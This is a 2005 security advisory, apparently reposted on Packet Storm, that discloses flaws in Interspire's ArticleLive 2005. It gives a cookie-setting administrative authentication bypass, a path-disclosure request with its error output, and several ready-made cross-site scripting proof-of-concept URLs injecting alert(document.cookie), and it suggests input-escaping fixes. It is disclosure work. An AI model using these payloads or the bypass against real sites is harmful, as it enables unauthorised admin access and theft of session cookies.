ArticleLive 2005 suffers from authentication bypass, SQL injection, and cross site scripting vulnerabilities.
f9b50e96c9caf7ee8022a754614175015c6871e528929b17c70ff1aa539e24de
Dcrab 's Security Advisory
[Hsc Security Group] https://www.hackerscenter.com/
[dP Security] https://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at https://www.digitalparadox.org/services.ah
***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! https://www.digitalparadox.org/services.ah
Looking for Publishers intrested in my Php Secure Coding Book.
Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005
Vendor: Interspire
Vendor Website: https://www.interspire.com/articlelive/
Summary: There are, authentication bypass, sql injections and xss in articlelive 2005.
Proof of Concept Exploits:
https://www.example.com/admin/?
Full administrative authentication bypass
In the control panel, by setting your cookie to auth=1 and userId=1 would give you full administrative access.
https://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='Information DisclosureCategories=0
Full Path Disclosure
Warning: Wrong datatype for second argument in call to in_array in
/home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on line 460
Warning: Bad arguments to implode() in /home/httpd/vhosts/example.com/httpdocs/templates/Default
(Stretched)/Panels/SearchResultsPanel.php on line 163
https://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
XSS
https://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS
https://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS
https://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
XSS
https://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
XSS
https://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
XSS
https://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
XSS
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input
validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
Keep your self updated, Rss feed at: https://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel
free to contact me regarding these vulnerabilities. You can find me at, https://www.hackerscenter.com or https://digitalparadox.org/.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed